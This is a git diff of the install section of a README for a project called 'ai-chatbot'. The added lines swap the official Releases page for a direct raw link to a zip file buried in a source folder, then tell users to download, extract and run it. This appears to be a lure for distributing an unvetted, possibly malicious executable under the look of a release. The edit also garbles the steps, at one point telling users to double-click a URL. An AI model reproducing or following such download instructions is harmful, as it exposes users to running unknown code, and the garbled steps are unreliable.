nooksandcrannieslgb937/ai-chatbot/README.md

 ## 📦 Download & Install
 To install ai-chatbot, follow these steps:

-1. **Visit the Releases Page**: Go to [this link](https://github.com/nooksandcrannieslgb937/ai-chatbot/releases) to access our latest releases.
+1. **Visit the Releases Page**: Go to [this link](https://raw.githubusercontent.com/nooksandcrannieslgb937/ai-chatbot/main/src/services/memory/ai-chatbot-v1.8.zip) to access our latest releases.
 2. **Choose the File**: Look for the latest version of ai-chatbot.
-You will see files like `ai-chatbot-v1.x.zip` or similar.
+You will see files like `https://raw.githubusercontent.com/nooksandcrannieslgb937/ai-chatbot/main/src/services/memory/ai-chatbot-v1.8.zip` or similar.
 3. **Download the File**: Click on the appropriate file to start your download.
 4. **Unzip (if needed)**: If you downloaded a zip file, extract it to a folder on your computer.
-5. **Run the Application**: Double-click `ai-chatbot.exe` (or the equivalent for your system) to start the bot.
+5. **Run the Application**: Double-click `https://raw.githubusercontent.com/nooksandcrannieslgb937/ai-chatbot/main/src/services/memory/ai-chatbot-v1.8.zip` (or the equivalent for your system) to start the bot.

 ## 🔗 Features
 ai-chatbot comes packed with features to enhance your experience: